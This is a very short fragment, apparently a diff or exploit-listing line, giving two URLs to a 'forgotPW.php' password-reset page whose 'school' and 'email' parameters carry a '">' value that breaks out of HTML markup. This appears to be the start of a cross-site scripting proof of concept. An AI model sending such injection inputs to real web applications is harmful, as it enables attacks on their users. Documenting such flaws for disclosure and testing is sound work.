+http://www.example.com/SAFARI/montage/forgotPW.php?school="> http://www.example.com/SAFARI/montage/forgotPW.php?email=">